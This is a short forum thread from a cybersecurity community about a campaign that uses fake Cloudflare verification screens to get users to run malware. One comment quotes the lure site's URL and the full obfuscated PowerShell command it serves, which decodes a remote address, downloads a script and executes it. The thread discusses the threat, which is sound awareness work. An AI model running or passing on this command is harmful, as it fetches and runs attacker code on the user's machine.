Kid@sh.itjust.worksM to Cybersecurity@sh.itjust.worksEnglish · 1 day agoHackers use Fake Cloudflare Verification Screen to Trick Users into Executing Malwarecybersecuritynews.comexternal-linkmessage-square9fedilinkarrow-up183arrow-down19
arrow-up174arrow-down1external-linkHackers use Fake Cloudflare Verification Screen to Trick Users into Executing Malwarecybersecuritynews.comKid@sh.itjust.worksM to Cybersecurity@sh.itjust.worksEnglish · 1 day agomessage-square9fedilink
minus-squareObject@sh.itjust.workslinkfedilinkEnglisharrow-up9arrow-down1·edit-21 day agoFor those who want to see it in action: https://dex-redirect.com/ It gives you the following script: powershell -NoExit -c “$znn=‘sggk://91.212.166.104/e/2e’;$djq=$znn.ToCharArray()|%{if($_ -cmatch ‘[a-z]’){[char](122 - ([int][char]$_ - 97))}else{$_}};$jgq=($djq -join ‘’);([ScriptBlock]::Create((Invoke-RestMethod $jgq))).Invoke();” I can’t check what the CAPTCHA prompt says since I’m on mobile, but I’m guessing it asks you to paste it into your console.
minus-squareNocturnalMorning@lemmy.worldlinkfedilinkEnglisharrow-up18·1 day agoBrb, gonna go get hacked real quick…
For those who want to see it in action:
https://dex-redirect.com/
It gives you the following script:
I can’t check what the CAPTCHA prompt says since I’m on mobile, but I’m guessing it asks you to paste it into your console.
Brb, gonna go get hacked real quick…